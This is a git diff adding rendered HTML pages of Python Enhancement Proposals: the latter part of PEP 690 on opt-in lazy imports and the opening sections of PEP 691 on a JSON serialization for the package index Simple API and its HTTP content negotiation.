It is the responsibility of the application developer enabling lazy imports for +their application to opt-out any library imports that turn out to need to be +eager for their application to work correctly; it is not the responsibility of +library authors to ensure that their library behaves exactly the same under lazy +imports.

+

The documentation of the feature, the -L flag, and the new importlib +APIs will be clear about the intended usage and the risks of adoption without +testing.

+
+
+

Implementation

+

Lazy imports are represented internally by a “lazy import” object. When a lazy +import occurs (say import foo or from foo import bar), the key "foo" +or "bar" is immediately added to the module namespace dictionary, but with +its value set to an internal-only “lazy import” object that preserves all the +necessary metadata to execute the import later.

+

A new boolean flag in PyDictKeysObject (dk_lazy_imports) is set to +signal that this particular dictionary may contain lazy import objects. This +flag is only used to efficiently resolve all lazy objects in “bulk” operations, +when a dictionary may contain lazy objects.

+

Anytime a key is looked up in a dictionary to extract its value, the +value is checked to see if it is a lazy import object. If so, the lazy object +is immediately resolved, the relevant imported modules executed, the lazy +import object is replaced in the dictionary (if possible) by the actual +imported value, and the resolved value is returned from the lookup function. A +dictionary could mutate as part of an import side effect while resolving a lazy +import object. In this case it is not possible to efficiently replace the key +value with the resolved object. In this case, the lazy import object will gain +a cached pointer to the resolved object. On next access that cached reference +will be returned and the lazy import object will be replaced in the dict with +the resolved value.

+

Because this is all handled internally by the dictionary implementation, lazy +import objects can never escape from the module namespace to become visible to +Python code; they are always resolved at their first reference. No stub, dummy +or thunk objects are ever visible to Python code or placed in sys.modules. +If a module is imported lazily, no entry for it will appear in sys.modules +at all until it is actually imported on first reference.

+

If two different modules (moda and modb) both contain a lazy import +foo, each module’s namespace dictionary will have an independent lazy import +object under the key "foo", delaying import of the same foo module. This +is not a problem. When there is first a reference to, say, moda.foo, the +module foo will be imported and placed in sys.modules as usual, and the +lazy object under the key moda.__dict__["foo"] will be replaced by the +actual module foo. At this point modb.__dict__["foo"] will remain a lazy +import object. When modb.foo is later referenced, it will also try to +import foo. This import will find the module already present in +sys.modules, as is normal for subsequent imports of the same module in +Python, and at this point will replace the lazy import object at +modb.__dict__["foo"] with the actual module foo.

+

There are two cases in which a lazy import object can escape a dictionary:

+
    +
  • Into another dictionary: to preserve the performance of bulk-copy operations +like dict.update() and dict.copy(), they do not check for or resolve +lazy import objects. However, if the source dict has the dk_lazy_imports +flag set that indicates it may contain lazy objects, that flag will be +passed on to the updated/copied dictionary. This still ensures that the lazy +import object can’t escape into Python code without being resolved.
  • +
  • Through the garbage collector: lazy imported objects are still Python objects +and live within the garbage collector; as such, they can be collected and seen +via e.g. gc.get_objects(). If a lazy object becomes +visible to Python code in this way, it is opaque and inert; it has no useful +methods or attributes. A repr() of it would be shown as something like: +<lazy_object 'fully.qualified.name'>.
  • +
+

When a lazy object is added to a dictionary, the flag dk_lazy_imports is set. +Once set, the flag is only cleared if all lazy import objects in the +dictionary are resolved, e.g. prior to dictionary iteration.

+

All dictionary iteration methods involving values (such as dict.items(), +dict.values(), PyDict_Next() etc.) will attempt to resolve all lazy +import objects in the dictionary prior to starting the iteration. Since only +(some) module namespace dictionaries will ever have dk_lazy_imports set, the +extra overhead of resolving all lazy import objects inside a dictionary is only +paid by those dictionaries that need it. Minimizing the overhead on normal +non-lazy dictionaries is the sole purpose of the dk_lazy_imports flag.

+

PyDict_Next will attempt to resolve all lazy import objects the first time +position 0 is accessed, and those imports could fail with exceptions. Since +PyDict_Next cannot set an exception, PyDict_Next will return 0 +immediately in this case, and any exception will be printed to stderr as an +unraisable exception.

+

For this reason, this PEP introduces PyDict_NextWithError, which works in +the same way as PyDict_Next, but which can set an error when returning 0 +and this should be checked via PyErr_Occurred() after the call.

+

The eagerness of imports within try / except / with blocks or within +class or function bodies is handled in the compiler via a new +EAGER_IMPORT_NAME opcode that always imports eagerly. Top-level imports use +IMPORT_NAME, which may be lazy or eager depending on -L and/or +importlib.set_lazy_imports().

+
+
+

Debugging

+

Debug logging from python -v will include logging whenever an import +statement has been encountered but execution of the import will be deferred.

+

Python’s -X importtime feature for profiling import costs adapts naturally +to lazy imports; the profiled time is the time spent actually importing.

+

Although lazy import objects are not generally visible to Python code, in some +debugging cases it may be useful to check from Python code whether the value at +a given key in a given dictionary is a lazy import object, without triggering +its resolution. For this purpose, importlib.is_lazy_import() can be used:

+
from importlib import is_lazy_import
+
+import foo
+
+is_lazy_import(globals(), "foo")
+
+foo
+
+is_lazy_import(globals(), "foo")
+
+
+

In this example, if lazy imports have been enabled the first call to +is_lazy_import will return True and the second will return False.

+
+
+

Per-module opt-out

+

Due to the backwards compatibility issues mentioned below, it may be necessary +for an application using lazy imports to force some imports to be eager.

+

In first-party code, since imports inside a try or with block are never +lazy, this can be easily accomplished:

+
try:  # force these imports to be eager
+    import foo
+    import bar
+finally:
+    pass
+
+
+

This PEP proposes to add a new importlib.eager_imports() context manager, +so the above technique can be less verbose and doesn’t require comments to +clarify its intent:

+
from importlib import eager_imports
+
+with eager_imports():
+    import foo
+    import bar
+
+
+

Since imports within context managers are always eager, the eager_imports() +context manager can just be an alias to a null context manager. The context +manager’s effect is not transitive: foo and bar will be imported +eagerly, but imports within those modules will still follow the usual laziness +rules.

+

The more difficult case can occur if an import in third-party code that can’t +easily be modified must be forced to be eager. For this purpose, +importlib.set_lazy_imports() takes a second optional keyword-only +excluding argument, which can be set to a container of module names within +which all imports will be eager:

+
from importlib import set_lazy_imports
+
+set_lazy_imports(excluding=["one.mod", "another"])
+
+
+

The effect of this is also shallow: all imports within one.mod will be +eager, but not imports in all modules imported by one.mod.

+

The excluding parameter of set_lazy_imports() can be a container of any +kind that will be checked to see whether it contains a module name. If the +module name is contained in the object, imports within it will be eager. Thus, +arbitrary opt-out logic can be encoded in a __contains__ method:

+
import re
+from importlib import set_lazy_imports
+
+class Checker:
+    def __contains__(self, name):
+        return re.match(r"foo\.[^.]+\.logger", name)
+
+set_lazy_imports(excluding=Checker())
+
+
+

If Python was executed with the -L flag, then lazy imports will already be +globally enabled, and the only effect of calling set_lazy_imports(True, +excluding=...) will be to globally set the eager module names/callback. If +set_lazy_imports(True) is called with no excluding argument, the +exclusion list/callback will be cleared and all eligible imports (module-level +imports not in try/except/with, and not import *) will be lazy from that +point forward.

+

This opt-out system is designed to maintain the possibility of local reasoning +about the laziness of an import. You only need to see the code of one module, +and the excluding argument to set_lazy_imports, if any, to know whether +a given import will be eager or lazy.

+
+
+

Testing

+

The CPython test suite will pass with lazy imports enabled (with some tests +skipped). One buildbot should run the test suite with lazy imports enabled.

+
+
+

C API

+

For authors of C extension modules, the proposed public C API is as follows:

+ ++++ + + + + + + + + + + + + + + + + + + + + + + +
C APIPython API
PyObject *PyImport_SetLazyImports(PyObject *enabled, PyObject *excluding)importlib.set_lazy_imports(enabled: bool = True, *, excluding: typing.Container[str] | None = None)
int PyDict_IsLazyImport(PyObject *dict, PyObject *name)importlib.is_lazy_import(dict: typing.Dict[str, object], name: str) -> bool
int PyImport_IsLazyImportsEnabled()importlib.is_lazy_imports_enabled() -> bool
void PyDict_ResolveLazyImports(PyObject *dict)
PyDict_NextWithError()
+
    +
  • void PyDict_ResolveLazyImports(PyObject *dict) resolves all lazy objects +in a dictionary, if any. To be used prior calling PyDict_NextWithError() +or PyDict_Next().
  • +
  • PyDict_NextWithError(), works the same way as PyDict_Next(), with +the exception it propagates any errors to the caller by returning 0 and +setting an exception. The caller should use PyErr_Occurred() to check for any +errors.
  • +
+
+
+
+

Backwards Compatibility

+

This proposal preserves full backwards compatibility when the feature is +disabled, which is the default.

+

Even when enabled, most code will continue to work normally without any +observable change (other than improved startup time and memory usage.) +Namespace packages are not affected: they work just as they do currently, +except lazily.

+

In some existing code, lazy imports could produce currently unexpected results +and behaviors. The problems that we may see when enabling lazy imports in an +existing codebase are related to:

+
+

Import Side Effects

+

Import side effects that would otherwise be produced by the execution of +imported modules during the execution of import statements will be deferred +until the imported objects are used.

+

These import side effects may include:

+
    +
  • code executing any side-effecting logic during import;
  • +
  • relying on imported submodules being set as attributes in the parent module.
  • +
+

A relevant and typical affected case is the click library for building Python command-line +interfaces. If e.g. cli = click.group() is defined in main.py, and +sub.py imports cli from main and adds subcommands to it via +decorator (@cli.command(...)), but the actual cli() call is in +main.py, then lazy imports may prevent the subcommands from being +registered, since in this case Click is depending on side effects of the import +of sub.py. In this case the fix is to ensure the import of sub.py is +eager, e.g. by using the importlib.eager_imports() context manager.

+
+
+

Dynamic Paths

+

There could be issues related to dynamic Python import paths; particularly, +adding (and then removing after the import) paths from sys.path:

+
sys.path.insert(0, "/path/to/foo/module")
+import foo
+del sys.path[0]
+foo.Bar()
+
+
+

In this case, with lazy imports enabled, the import of foo will not actually +occur while the addition to sys.path is present.

+

An easy fix for this (which also improves the code style and ensures cleanup) +would be to place the sys.path modifications in a context manager. This +resolves the issue, since imports inside a with block are always eager.

+
+
+

Deferred Exceptions

+

Exceptions that occur during a lazy import bubble up and erase the +partially-constructed module(s) from sys.modules, just as exceptions during +normal import do.

+

Since errors raised during a lazy import will occur later than they would if +the import were eager (i.e. wherever the name is first referenced), it is also +possible that they could be accidentally caught by exception handlers that did +not expect the import to be running within their try block, leading to +confusion.

+
+
+
+

Drawbacks

+

Downsides of this PEP include:

+
    +
  • It provides a subtly incompatible semantics for the behavior of Python +imports. This is a potential burden on library authors who may be asked by their +users to support both semantics, and is one more possibility for Python +users/readers to be aware of.
  • +
  • Some popular Python coding patterns (notably centralized registries populated +by a decorator) rely on import side effects and may require explicit opt-out to +work as expected with lazy imports.
  • +
  • Exceptions can be raised at any point while accessing names representing lazy +imports, this could lead to confusion and debugging of unexpected exceptions.
  • +
+

Lazy import semantics are already possible and even supported today in the +Python standard library, so these drawbacks are not newly introduced by this +PEP. So far, existing usage of lazy imports by some applications has not proven +a problem. But this PEP could make the usage of lazy imports more popular, +potentially exacerbating these drawbacks.

+

These drawbacks must be weighed against the significant benefits offered by this +PEP’s implementation of lazy imports. Ultimately these costs will be higher if +the feature is widely used; but wide usage also indicates the feature provides a +lot of value, perhaps justifying the costs.

+
+
+

Security Implications

+

Deferred execution of code could produce security concerns if process owner, +shell path, sys.path, or other sensitive environment or contextual states +change between the time the import statement is executed and the time the +imported object is first referenced.

+
+
+

Performance Impact

+

The reference implementation has shown that the feature has negligible +performance impact on existing real-world codebases (Instagram Server, several +CLI programs at Meta, Jupyter notebooks used by Meta researchers), while +providing substantial improvements to startup time and memory usage.

+

The reference implementation shows no measurable change +in aggregate performance on the pyperformance benchmark suite.

+
+
+

How to Teach This

+

Since the feature is opt-in, beginners should not encounter it by default. +Documentation of the -L flag and importlib.set_lazy_imports() can +clarify the behavior of lazy imports.

+

The documentation should also clarify that opting into lazy imports is opting +into a non-standard semantics for Python imports, which could cause Python +libraries to break in unexpected ways. The responsibility to identify these +breakages and work around them with an opt-out (or stop using lazy imports) +rests entirely with the person choosing to enable lazy imports for their +application, not with the library author. Python libraries are under no +obligation to support lazy import semantics. Politely reporting an +incompatibility may be useful to the library author, but they may choose to +simply say their library does not support use with lazy imports, and this is a +valid choice.

+

Some best practices to deal with some of the issues that could arise and to +better take advantage of lazy imports are:

+
    +
  • Avoid relying on import side effects. Perhaps the most common reliance on +import side effects is the registry pattern, where population of some external +registry happens implicitly during the importing of modules, often via +decorators. Instead, the registry should be built via an explicit call that does +a discovery process to find decorated functions or classes in explicitly +nominated modules.
  • +
  • Always import needed submodules explicitly, don’t rely on some other import +to ensure a module has its submodules as attributes. That is, unless there is an +explicit from . import bar in foo/__init__.py, always do import +foo.bar; foo.bar.Baz, not import foo; foo.bar.Baz. The latter only works +(unreliably) because the attribute foo.bar is added as a side effect of +foo.bar being imported somewhere else. With lazy imports this may not always +happen in time.
  • +
  • Avoid using star imports, as those are always eager.
  • +
+
+
+

Reference Implementation

+

The initial implementation is available as part of Cinder. This reference implementation +is in use within Meta and has proven to achieve improvements in startup time +(and total runtime for some applications) in the range of 40%-70%, as well as +significant reduction in memory footprint (up to 40%), thanks to not needing to +execute imports that end up being unused in the common flow.

+

An updated reference implementation based on CPython main branch is also available.

+
+
+

Rejected Ideas

+
+

Wrapping deferred exceptions

+

To reduce the potential for confusion, exceptions raised in the +course of executing a lazy import could be replaced by a LazyImportError +exception (a subclass of ImportError), with a __cause__ set to the +original exception.

+

Ensuring that all lazy import errors are raised as LazyImportError would +reduce the likelihood that they would be accidentally caught and mistaken for a +different expected exception. However, in practice we have seen cases, e.g. +inside tests, where failing modules raise unittest.SkipTest exception and +this too would end up being wrapped in LazyImportError, making such tests +fail because the true exception type is hidden. The drawbacks here seem to +outweigh the hypothetical case where unexpected deferred exceptions are caught +by mistake.

+
+
+

Per-module opt-in

+

A per-module opt-in using future imports (i.e. +from __future__ import lazy_imports) does not make sense because +__future__ imports are not feature flags, they are for transition to +behaviors which will become default in the future. It is not clear if lazy +imports will ever make sense as the default behavior, so we should not +promise this with a __future__ import.

+

There are other cases where a library might desire to locally opt-in to lazy +imports for a particular module; e.g. a lazy top-level __init__.py for a +large library, to make its subcomponents accessible as lazy attributes. For now, +to keep the feature simpler, this PEP chooses to focus on the “application” use +case and does not address the library use case. The underlying laziness +mechanism introduced in this PEP could be used in the future to address this use +case as well.

+
+
+

Explicit syntax for individual lazy imports

+

If the primary objective of lazy imports were solely to work around import +cycles and forward references, an explicitly-marked syntax for particular +targeted imports to be lazy would make a lot of sense. But in practice it would +be very hard to get robust startup time or memory use benefits from this +approach, since it would require converting most imports within your code base +(and in third-party dependencies) to use the lazy import syntax.

+

It would be possible to aim for a “shallow” laziness where only the top-level +imports of subsystems from the main module are made explicitly lazy, but then +imports within the subsystems are all eager. This is extremely fragile, though +– it only takes one mis-placed import to undo the carefully constructed +shallow laziness. Globally enabling lazy imports, on the other hand, provides +in-depth robust laziness where you always pay only for the imports you use.

+

There may be use cases (e.g. for static typing) where individually-marked lazy +imports are desirable to avoid forward references, but the perf/memory benefits +of globally lazy imports are not needed. Since this is a different set of +motivating use cases and requires new syntax, we prefer not to include it in +this PEP. Another PEP could build on top of this implementation and propose the +additional syntax.

+
+
+

Environment variable to enable lazy imports

+

Providing an environment variable opt-in lends itself too easily to abuse of the +feature. It may seem tempting for a Python user to, for instance, globally set +the environment variable in their shell in the hopes of speeding up all the +Python programs they run. This usage with untested programs is likely to lead to +spurious bug reports and maintenance burden for the authors of those tools. To +avoid this, we choose not to provide an environment variable opt-in at all.

+
+
+

Removing the -L flag

+

We do provide the -L CLI flag, which could in theory be abused in a similar +way by an end user running an individual Python program that is run with +python somescript.py or python -m somescript (rather than distributed +via Python packaging tools). But the potential scope for misuse is much less +with -L than an environment variable, and -L is valuable for some +applications to maximize startup time benefits by ensuring that all imports from +the start of a process will be lazy, so we choose to keep it.

+

It is already the case that running arbitrary Python programs with command line +flags they weren’t intended to be used with (e.g. -s, -S, -E, or +-I) can have unexpected and breaking results. -L is nothing new in this +regard.

+
+
+

Half-lazy imports

+

It would be possible to eagerly run the import loader to the point of finding +the module source, but then defer the actual execution of the module and +creation of the module object. The advantage of this would be that certain +classes of import errors (e.g. a simple typo in the module name) would be +caught eagerly instead of being deferred to the use of an imported name.

+

The disadvantage would be that the startup time benefits of lazy imports would +be significantly reduced, since unused imports would still require a filesystem +stat() call, at least. It would also introduce a possibly non-obvious split +between which import errors are raised eagerly and which are delayed, when +lazy imports are enabled.

+

This idea is rejected for now on the basis that in practice, confusion about +import typos has not been an observed problem with the reference +implementation. Generally delayed imports are not delayed forever, and errors +show up soon enough to be caught and fixed (unless the import is truly unused.)

+

Another possible motivation for half-lazy imports would be to allow modules +themselves to control via some flag whether they are imported lazily or eagerly. +This is rejected both on the basis that it requires half-lazy imports, giving up +some of the performance benefits of import laziness, and because in general +modules do not decide how or when they are imported, the module importing them +decides that. There isn’t clear rationale for this PEP to invert that control; +instead it just provides more options for the importing code to make the +decision.

+
+
+

Lazy dynamic imports

+

It would be possible to add a lazy=True or similar option to +__import__() and/or importlib.import_module(), to enable them to +perform lazy imports. That idea is rejected in this PEP for lack of a clear +use case. Dynamic imports are already far outside the PEP 8 code style +recommendations for imports, and can easily be made precisely as lazy as +desired by placing them at the desired point in the code flow. These aren’t +commonly used at module top level, which is where lazy imports applies.

+
+
+

Deep eager-imports override

+

The proposed importlib.eager_imports() context manager and excluded modules +in the importlib.set_lazy_imports(excluding=...) override all have shallow +effects: they only force eagerness for the location they are applied to, not +transitively. It would be possible to provide a deep/transitive version of one +or both. That idea is rejected in this PEP because the implementation would be +complex (taking into account threads and async code), experience with the +reference implementation has not shown it to be necessary, and because it +prevents local reasoning about laziness of imports.

+

A deep override can lead to confusing behavior because the +transitively-imported modules may be imported from multiple locations, some of +which use the “deep eager override” and some of which don’t. Thus those modules +may still be imported lazily initially, if they are first imported from a +location that doesn’t have the override.

+

With deep overrides it is not possible to locally reason about whether a given +import will be lazy or eager. With the behavior specified in this PEP, such +local reasoning is possible.

+
+
+

Making lazy imports the default behavior

+

Making lazy imports the default/sole behavior of Python imports, instead of +opt-in, would have some long-term benefits, in that library authors would +(eventually) no longer need to consider the possibility of both semantics.

+

However, the backwards-incompatibilies are such that this could only be +considered over a long time frame, with a __future__ import. It is not at +all clear that lazy imports should become the default import semantics for +Python.

+

This PEP takes the position that the Python community needs more experience with +lazy imports before considering making it the default behavior, so that is +entirely left to a possible future PEP.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0690.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0691/index.html b/pep-0691/index.html new file mode 100644 index 00000000000..16b9f449702 --- /dev/null +++ b/pep-0691/index.html @@ -0,0 +1,1100 @@ + + + + + + + + PEP 691 – JSON-based Simple API for Python Package Indexes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 691 – JSON-based Simple API for Python Package Indexes

+
+
Author:
+
Donald Stufft <donald at stufft.io>, +Pradyun Gedam <pradyunsg at gmail.com>, +Cooper Lees <me at cooperlees.com>, +Dustin Ingram <di at python.org>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
04-May-2022
+
Post-History:
+
05-May-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The “Simple Repository API” that was defined in PEP 503 (and was in use much +longer than that) has served us reasonably well for a very long time. However, +the reliance on using HTML as the data exchange mechanism has several +shortcomings.

+

There are two major issues with an HTML-based API:

+
    +
  • While HTML5 is a standard, it’s an incredibly complex standard and ensuring +completely correct parsing of it involves complex logic that does not +currently exist within the Python standard library (nor the standard library +of many other languages).

    This means that to actually accept everything that is technically valid, tools +have to pull in large dependencies or they have to rely on the standard library’s +html.parser library, which is lighter weight but potentially doesn’t +fully support HTML5.

    +
  • +
  • HTML5 is primarily designed as a markup language to present documents for human +consumption. Our use of it is driven largely for historical and accidental +reasons, and it’s unlikely anyone would design an API that relied on it if +they were starting from scratch.

    The primary issue with using a markup format designed for human consumption +is that there’s not a great way to actually encode data within HTML. We’ve +gotten around this by limiting the data we put in this API and being creative +with how we can cram data into the API (for instance, hashes are embedded as +URL fragments, adding the data-yanked attribute in PEP 592).

    +
  • +
+

PEP 503 was largely an attempt to standardize what was already in use, so it +did not propose any large changes to the API.

+

In the intervening years, we’ve regularly talked about an “API V2” that would +re-envision the entire API of PyPI. However, due to limited time constraints, +that effort has not gained much, if any, traction beyond people thinking that +it would be nice to do.

+

This PEP attempts to take a different route. It doesn’t fundamentally change +the overall API structure, but instead specifies a new serialization of the +existing data contained in existing PEP 503 responses in a format that is +easier for software to parse rather than using a human centric document format.

+
+
+

Goals

+
    +
  • Enable zero configuration discovery. Clients of the simple API MUST be +able to gracefully determine whether a target repository supports this PEP +without relying on any form of out of band communication (configuration, prior +knowledge, etc). Individual clients MAY choose to require configuration +to enable the use of this API, however.
  • +
  • Enable clients to drop support for “legacy” HTML parsing. While it is expected +that most clients will keep supporting HTML-only repositories for a while, if not +forever, it should be possible for a client to choose to support only the new +API formats and no longer invoke an HTML parser.
  • +
  • Enable repositories to drop support for “legacy” HTML formats. Similar to +clients, it is expected that most repositories will continue to support HTML +responses for a long time, or forever. It should be possible for a repository to +choose to only support the new formats.
  • +
  • Maintain full support for existing HTML-only clients. We MUST not break +existing clients that are accessing the API as a strictly PEP 503 API. The only +exception to this, is if the repository itself has chosen to no longer support +the HTML format.
  • +
  • Minimal additional HTTP requests. Using this API MUST not drastically +increase the amount of HTTP requests an installer must do in order to function. +Ideally it will require 0 additional requests, but if needed it may require one +or two additional requests (total, not per dependency).
  • +
  • Minimal additional unique responses. Due to the nature of how large +repositories like PyPI cache responses, this PEP should not introduce a +significantly or combinatorially large number of additional unique responses +that the repository may produce.
  • +
  • Supports TUF. This PEP MUST be able to function within the bounds of +what TUF can support (PEP 458), and must be able to be secured using it.
  • +
  • Require only the standard library, or small external dependencies for clients. +Parsing an API response should ideally require nothing but the standard +library, however it would be acceptable to require a small, pure Python +dependency.
  • +
+
+
+

Specification

+

To enable response parsing with only the standard library, this PEP specifies that +all responses (besides the files themselves, and the HTML responses from +PEP 503) should be serialized using JSON.

+

To enable zero configuration discovery and to minimize the amount of additional HTTP +requests, this PEP extends PEP 503 such that all of the API endpoints (other than the +files themselves) will utilize HTTP content negotiation to allow client and server to +select the correct serialization format to serve, i.e. either HTML or JSON.

+
+

Versioning

+

Versioning will adhere to PEP 629 format (Major.Minor), which has defined the +existing HTML responses to be 1.0. Since this PEP does not introduce new features +into the API, rather it describes a different serialization format for the existing +features, this PEP does not change the existing 1.0 version, and instead just +describes how to serialize that into JSON.

+

Similar to PEP 629, the major version number MUST be incremented if any +changes to the new format would result in no longer being able to expect existing +clients to meaningfully understand the format.

+

Likewise, the minor version MUST be incremented if features are +added or removed from the format, but existing clients would be expected to continue +to meaningfully understand the format.

+

Changes that would not result in existing clients being unable to meaningfully +understand the format and which do not represent features being added or removed +may occur without changing the version number.

+

This is intentionally vague, as this PEP believes it is best left up to future PEPs +that make any changes to the API to investigate and decide whether or not that +change should increment the major or minor version.

+

Future versions of the API may add things that can only be represented in a subset +of the available serializations of that version. All serializations version numbers, +within a major version, SHOULD be kept in sync, but the specifics of how a +feature serializes into each format may differ, including whether or not that feature +is present at all.

+

It is the intent of this PEP that the API should be thought of as URL endpoints that +return data, whose interpretation is defined by the version of that data, and then +serialized into the target serialization format.

+
+
+

JSON Serialization

+

The URL structure from PEP 503 still applies, as this PEP only adds an additional +serialization format for the already existing API.

+

The following constraints apply to all JSON serialized responses described in this +PEP:

+
    +
  • All JSON responses will always be a JSON object rather than an array or other +type.
  • +
  • While JSON doesn’t natively support an URL type, any value that represents an +URL in this API may be either absolute or relative as long as they point to +the correct location. If relative, they are relative to the current URL as if +it were HTML.
  • +
  • Additional keys may be added to any dictionary objects in the API responses +and clients MUST ignore keys that they don’t understand.
  • +
  • All JSON responses will have a meta key, which contains information related to +the response itself, rather than the content of the response.
  • +
  • All JSON responses will have a meta.api-version key, which will be a string that +contains the PEP 629 Major.Minor version number, with the same fail/warn +semantics as defined in PEP 629.
  • +
  • All requirements of PEP 503 that are not HTML specific still apply.
  • +
+
+

Project List

+

The root URL / for this PEP (which represents the base URL) will be a JSON encoded +dictionary which has a two keys:

+
    +
  • projects: An array where each entry is a dictionary with a single key, name, which represents string of the project name.
  • +
  • meta: The general response metadata as described earlier.
  • +
+

As an example:

+
{
+  "meta": {
+    "api-version": "1.0"
+  },
+  "projects": [
+    {"name": "Frob"},
+    {"name": "spamspamspam"}
+  ]
+}
+
+
+
+

Note

+

The name field is the same as the one from PEP 503, which does not specify +whether it is the non-normalized display name or the normalized name. In practice +different implementations of these PEPs are choosing differently here, so relying +on it being either non-normalized or normalized is relying on an implementation +detail of the repository in question.

+
+
+

Note

+

While the projects key is an array, and thus is required to be in some kind +of an order, neither PEP 503 nor this PEP requires any specific ordering nor +that the ordering is consistent from one request to the next. Mentally this is +best thought of as a set, but both JSON and HTML lack the functionality to have +sets.

+
+
+
+

Project Detail

+

The format of this URL is /<project>/ where the <project> is replaced by the +PEP 503 normalized name for that project, so a project named “Silly_Walk” would +have a URL like /silly-walk/.

+

This URL must respond with a JSON encoded dictionary that has three keys:

+
    +
  • name: The normalized name of the project.
  • +
  • files: A list of dictionaries, each one representing an individual file.
  • +
  • meta: The general response metadata as described earlier.
  • +
+

Each individual file dictionary has the following keys:

+
    +
  • filename: The filename that is being represented.
  • +
  • url: The URL that the file can be fetched from.
  • +
  • hashes: A dictionary mapping a hash name to a hex encoded digest of the file. +Multiple hashes can be included, and it is up to the client to decide what to do +with multiple hashes (it may validate all of them or a subset of them, or nothing +at all). These hash names SHOULD always be normalized to be lowercase.

    The hashes dictionary MUST be present, even if no hashes are available +for the file, however it is HIGHLY recommended that at least one secure, +guaranteed-to-be-available hash is always included.

    +

    By default, any hash algorithm available via hashlib (specifically any that can +be passed to hashlib.new() and do not require additional parameters) can +be used as a key for the hashes dictionary. At least one secure algorithm from +hashlib.algorithms_guaranteed SHOULD always be included. At the time +of this PEP, sha256 specifically is recommended.

    +
  • +
  • requires-python: An optional key that exposes the Requires-Python +metadata field, specified in PEP 345. Where this is present, installer tools +SHOULD ignore the download when installing to a Python version that +doesn’t satisfy the requirement.

    Unlike data-requires-python in PEP 503, the requires-python key does not +require any special escaping other than anything JSON does naturally.

    +
  • +
  • dist-info-metadata: An optional key that indicates +that metadata for this file is available, via the same location as specified in +PEP 658 ({file_url}.metadata). Where this is present, it MUST be +either a boolean to indicate if the file has an associated metadata file, or a +dictionary mapping hash names to a hex encoded digest of the metadata’s hash.

    When this is a dictionary of hashes instead of a boolean, then all the same +requirements and recommendations as the hashes key hold true for this key as +well.

    +

    If this key is missing then the metadata file may or may not exist. If the key +value is truthy, then the metadata file is present, and if it is falsey then it +is not.

    +

    It is recommended that servers make the hashes of the metadata file available if +possible.

    +
  • +
  • gpg-sig: An optional key that acts a boolean to indicate if the file has +an associated GPG signature or not. The URL for the signature file follows what +is specified in PEP 503 ({file_url}.asc). If this key does not exist, then +the signature may or may not exist.
  • +
  • yanked: An optional key which may be either a boolean to indicate if the +file has been yanked, or a non empty, but otherwise arbitrary, string to indicate +that a file has been yanked with a specific reason. If the yanked key is present +and is a truthy value, then it SHOULD be interpreted as indicating that the +file pointed to by the url field has been “Yanked” as per PEP 592.
  • +
+

As an example:

+
{
+  "meta": {
+    "api-version": "1.0"
+  },
+  "name": "holygrail",
+  "files": [
+    {
+      "filename": "holygrail-1.0.tar.gz",
+      "url": "https://example.com/files/holygrail-1.0.tar.gz",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "yanked": "Had a vulnerability"
+    },
+    {
+      "filename": "holygrail-1.0-py3-none-any.whl",
+      "url": "https://example.com/files/holygrail-1.0-py3-none-any.whl",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "dist-info-metadata": true
+    }
+  ]
+}
+
+
+
+

Note

+

While the files key is an array, and thus is required to be in some kind +of an order, neither PEP 503 nor this PEP requires any specific ordering nor +that the ordering is consistent from one request to the next. Mentally this is +best thought of as a set, but both JSON and HTML lack the functionality to have +sets.

+
+
+
+
+

Content-Types

+

This PEP proposes that all responses from the Simple API will have a standard +content type that describes what the response is (a Simple API response), what +version of the API it represents, and what serialization format has been used.

+

The structure of this content type will be:

+
application/vnd.pypi.simple.$version+format
+
+
+

Since only major versions should be disruptive to clients attempting to +understand one of these API responses, only the major version will be included +in the content type, and will be prefixed with a v to clarify that it is a +version number.

+

Which means that for the existing 1.0 API, the content types would be:

+
    +
  • JSON: application/vnd.pypi.simple.v1+json
  • +
  • HTML: application/vnd.pypi.simple.v1+html
  • +
+

In addition to the above, a special “meta” version is supported named latest, +whose purpose is to allow clients to request the absolute latest version, without +having to know ahead of time what that version is. It is recommended however, +that clients be explicit about what versions they support.

+

To support existing clients which expect the existing PEP 503 API responses to +use the text/html content type, this PEP further defines text/html as an alias +for the application/vnd.pypi.simple.v1+html content type.

+
+
+

Version + Format Selection

+

Now that there is multiple possible serializations, we need a mechanism to allow +clients to indicate what serialization formats they’re able to understand. In +addition, it would be beneficial if any possible new major version to the API can +be added without disrupting existing clients expecting the previous API version.

+

To enable this, this PEP standardizes on the use of HTTP’s +Server-Driven Content Negotiation.

+

While this PEP won’t fully describe the entirety of server-driven content +negotiation, the flow is roughly:

+
    +
  1. The client makes an HTTP request containing an Accept header listing all +of the version+format content types that they are able to understand.
  2. +
  3. The server inspects that header, selects one of the listed content types, +then returns a response using that content type (treating the absence of +an Accept header as Accept: */*).
  4. +
  5. If the server does not support any of the content types in the Accept +header then they are able to choose between 3 different options for how to +respond:
      +
    1. Select a default content type other than what the client has requested +and return a response with that.
    2. +
    3. Return a HTTP 406 Not Acceptable response to indicate that none of +the requested content types were available, and the server was unable +or unwilling to select a default content type to respond with.
    4. +
    5. Return a HTTP 300 Multiple Choices response that contains a list of +all of the possible responses that could have been chosen.
    6. +
    +
  6. +
  7. The client interprets the response, handling the different types of responses +that the server may have responded with.
  8. +
+

This PEP does not specify which choices the server makes in regards to handling +a content type that it isn’t able to return, and clients SHOULD be prepared +to handle all of the possible responses in whatever way makes the most sense for +that client.

+

However, as there is no standard format for how a 300 Multiple Choices +response can be interpreted, this PEP highly discourages servers from utilizing +that option, as clients will have no way to understand and select a different +content-type to request. In addition, it’s unlikely that the client could +understand a different content type anyways, so at best this response would +likely just be treated the same as a 406 Not Acceptable error.

+

